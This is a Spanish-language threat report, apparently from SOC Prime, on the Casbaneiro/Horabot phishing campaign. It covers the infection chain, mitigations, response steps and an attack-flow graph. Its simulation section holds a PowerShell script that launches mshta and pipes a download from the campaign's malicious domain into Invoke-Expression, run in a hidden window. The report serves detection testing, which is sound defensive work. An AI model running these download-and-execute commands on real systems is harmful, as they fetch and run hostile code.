Desempaquetando las campañas multifacéticas de Casbaneiro del Marauder mejorado

Ruslan Mikhalov Jefe de Investigación de Amenazas en SOC Prime

Seguir

Desempaquetando las campañas multifacéticas de Casbaneiro del Marauder mejorado

Detection stack

AIDR
Alert
ETL
Query

Informe de Amenazas
Flujo de Ataque
Detecciones
Simulaciones

Investigación

Los investigadores reconstruyeron la cadena de extremo a extremo desde el archivo adjunto inicial hasta la ejecución de la carga útil final. Analizaron una etapa HTA que activa mshta.exe, seguida por un cargador JavaScript/VBScript de dos pasos y componentes AutoIT utilizados para descifrar contenedores cifrados con AES con un valor de semilla codificado. El análisis estático confirmó la presencia de los binarios Horbot y Casbaneiro, junto con lógica anti-análisis que verifica nombres de usuario de sandbox y artefactos relacionados con VM. Las observaciones de red mostraron infraestructura C2 protegida por dominios de Cloudflare y una API PHP utilizada para generar PDFs dinámicos por cada víctima durante la fase de entrega.

Mitigación

Bloquear o controlar estrictamente la ejecución de mshta.exe para contenido no confiable y fortalecer la inspección de archivos adjuntos para cadenas basadas en ZIP/HTA/script. Monitorear el comportamiento anormal de PowerShell que interactúa con objetos COM de Outlook, lo que puede indicar propagación impulsada por el buzón de correo. En el nivel de red, bloquear o alertar sobre los dominios maliciosos identificados y la dirección IP, y aplicar filtrado de URLs para restringir el acceso a servicios de generación de PDFs utilizados para el staging. Usar listas blancas de aplicaciones para prevenir que intérpretes AutoIT se ejecuten sin aprobación explícita.

Respuesta

Cuando se detecta actividad, aísle el punto final, detenga los procesos sospechosos de mshta.exe y PowerShell, y elimine los artefactos recién creados, especialmente los archivos colocados en directorios Públicos. Recolecte las etapas HTA, VBS y AutoIT para análisis forense, luego busque staticdata.dll y at.dll en los hosts afectados. Restablecer las credenciales de las cuentas de correo electrónico comprometidas, deshabilitar la automatización o reglas maliciosas de Outlook COM y actualizar el contenido de detección con los IOCs extraídos mientras monitorea la propagación lateral y el phishing adicional desde buzones de correo secuestrados.

Palabras clave: Marauder Aumentado, Water Saci, Casbaneiro, Horbot, América Latina, phishing en español, señuelo de WhatsApp, ClickFix, HTA, mshta.exe, cargador de VBScript, JavaScript, AutoIT, PowerShell, Outlook COM, descifrado AES, UUID ZIP, PDF protegido por contraseña, Cloudflare C2, API PHP, troyano bancario, toma de control de cuenta de correo electrónico.

"graph TB %% Definiciones de Clases classDef action fill:#99ccff classDef tool fill:#cccccc classDef file fill:#e6e6e6 classDef process fill:#ffdd99 classDef malware fill:#ff9999 classDef persistence fill:#ccffcc classDef c2 fill:#ffcc99 classDef operator fill:#ff9900 %% Definiciones de nodos action_phish_attach["Acción – T1566.001 Phishing: Spearphishing Attachment Correo electrónico malicioso con un PDF protegido por contraseña que se hace pasar por una citación judicial"] class action_phish_attach action action_phish_link["Acción – T1566.002 Phishing: Spearphishing Link Enlace en PDF que desencadena la descarga automática de un archivo ZIP con un nombre UUID aleatorio"] class action_phish_link action file_zip["Archivo – Archivo ZIP Contiene archivo HTA"] class file_zip file file_hta["Archivo – Archivo HTA Ejecutado a través de mshta.exe"] class file_hta file process_mshta["Proceso – mshta.exe Carga JavaScript que recupera el VBScript de segunda etapa"] class process_mshta process script_vb["Acción – T1059.005 Interprete de Comandos y Scripts: Visual Basic Verificaciones del sandbox y descarga de carga útil"] class script_vb malware action_sandbox_evasion["Acción – T1497.002 Evasión de Virtualización/Sandbox Verificaciones basadas en actividad del usuario para nombres de usuario del sandbox y artefactos de VM"] class action_sandbox_evasion action action_deobfuscation["Acción – T1140 Desofuscar/Decodificar Archivos o Información Desofuscación en tiempo real de cadenas y código"] class action_deobfuscation action script_powershell["Acción – T1059.001 Interprete de Comandos y Scripts: PowerShell Descarga el intérprete de AutoIT y cosecha contactos de Outlook"] class script_powershell malware tool_outlook["Herramienta – Objetos COM de Outlook Raspar libreta de direcciones para propagación de correo electrónico"] class tool_outlook tool tool_autoit["Herramienta – AutoIT Scripts compilados producen cargas útiles cifradas"] class tool_autoit tool action_compile["Acción – T1027.004 Archivos o Información Ofuscada: Compilar Después de la Entrega Cargas útiles compiladas en el host antes de la ejecución"] class action_compile action malware_dll["Malware – DLLs Cifrados (staticdata.dll, at.dll)"] class malware_dll malware process_reflect_load["Proceso – Carga de DLLs Reflexiva Carga DLLs directamente en memoria sin escribir en disco"] class process_reflect_load process action_injection["Acción – T1055.001 Inyección de Procesos: Inyección de DLL DLLs cargadas de manera reflexiva inyectadas en procesos"] class action_injection action persistence_shortcut["Persistencia – T1547.009 Modificación de Accesos Directos LNK colocado en la carpeta de Inicio"] class persistence_shortcut persistence c2_communication["C2 – T1102 Servicio Web HTTP GET/POST a través de dominios protegidos por Cloudflare"] class c2_communication c2 tool_turo["Herramienta – Turo.exe (compilado en AutoIT)"] class tool_turo tool tool_tekojac["Herramienta – Tekojac.exe (Auto2Exe)"] class tool_tekojac tool action_masquerade["Acción – T1036.008 Disfrazamiento Los archivos PDF y ZIP parecen legítimos"] class action_masquerade action %% Conexiones action_phish_attach –>|entrega| file_zip file_zip –>|contiene| file_hta file_hta –>|ejecutado por| process_mshta process_mshta –>|carga| script_vb script_vb –>|realiza| action_sandbox_evasion action_sandbox_evasion –>|lleva a| action_deobfuscation action_deobfuscation –>|revela| script_powershell script_powershell –>|utiliza| tool_outlook script_powershell –>|descargas| tool_autoit tool_autoit –>|produce| action_compile action_compile –>|genera| malware_dll malware_dll –>|cargado por| process_reflect_load process_reflect_load –>|habilita| action_injection action_injection –>|inyecta en| process_mshta action_injection –>|habilita| persistence_shortcut persistence_shortcut –>|mantiene| c2_communication script_powershell –>|descargas| tool_turo script_powershell –>|descargas| tool_tekojac action_masquerade –>|cubre| action_phish_attach action_masquerade –>|cubre| action_phish_link %% Estilos class action_phish_attach action class action_phish_link action class file_zip file class file_hta file class process_mshta process class script_vb malware class action_sandbox_evasion action class action_deobfuscation action class script_powershell malware class tool_outlook tool class tool_autoit tool class action_compile action class malware_dll malware class process_reflect_load process class action_injection action class persistence_shortcut persistence class c2_communication c2 class tool_turo tool class tool_tekojac tool class action_masquerade action "

Flujo de ataque

Ver

Ejecución de simulación

Requisito previo: la verificación preliminar de Telemetría y Línea Base debe haber pasado.

Razonamiento: Esta sección detalla la ejecución precisa de la técnica del adversario (TTP) diseñada para activar la regla de detección. Los comandos y la narrativa DEBEN reflejar directamente las TTP identificadas y tienen como objetivo generar la telemetría exacta esperada por la lógica de detección. Ejemplos abstractos o no relacionados llevarán a un diagnóstico erróneo.

Narrativa de Ataque y Comandos:
El actor de la amenaza tiene como objetivo establecer una base en la estación de trabajo de una víctima aprovechando Mshta para descargar y ejecutar una carga útil maliciosa de HTA alojada en https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK. Inmediatamente después, el actor utiliza PowerShell para descargar un script de segunda etapa desde el mismo dominio a través de Invoke‑WebRequest y lo ejecuta en memoria. Ambos binarios se lanzan desde un símbolo del sistema elevado para aumentar la probabilidad de registro de auditoría.

Script de Prueba de Regresión:

# Simulación de Horabot: activa tanto mshta como PowerShell en la misma sesión
# 1. Lanza Mshta con URL maliciosa
$htaUrl = "https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK"
Start-Process -FilePath "$env:SystemRootsystem32mshta.exe" -ArgumentList $htaUrl -WindowStyle Hidden

# 2. Lanza PowerShell para descargar y ejecutar un script remoto
$psUrl = "https://ge.factu.it.com/GZSPEGIJ/YFSBNPQK/payload.ps1"
Start-Process -FilePath "$env:SystemRootSystem32WindowsPowerShellv1.0powershell.exe" `
    -ArgumentList "-NoProfile -ExecutionPolicy Bypass -Command `"Invoke-WebRequest -Uri '$psUrl' -UseBasicParsing | Invoke-Expression`"" `
    -WindowStyle Hidden

Comandos de Limpieza:

# Terminar cualquier proceso malicioso persistente (si sobrevivieron)
Get-Process -Name mshta, powershell -ErrorAction SilentlyContinue | Stop-Process -Force

# Eliminar cualquier archivo que podría haberse dejado caer (ubicaciones de ejemplo)
$paths = @(
    "$env:TEMPpayload.ps1",
    "$env:APPDATAMicrosoftWindowsStart MenuProgramsStartupmalicious.hta"
)
foreach ($p in $paths) {
    if (Test-Path $p) { Remove-Item -Path $p -Force }
}

Únete a la plataforma Detection as Code de SOC Prime para mejorar la visibilidad de las amenazas más relevantes para tu negocio. Para ayudarte a comenzar y obtener valor inmediato, programa una reunión ahora con los expertos de SOC Prime.

Únete gratis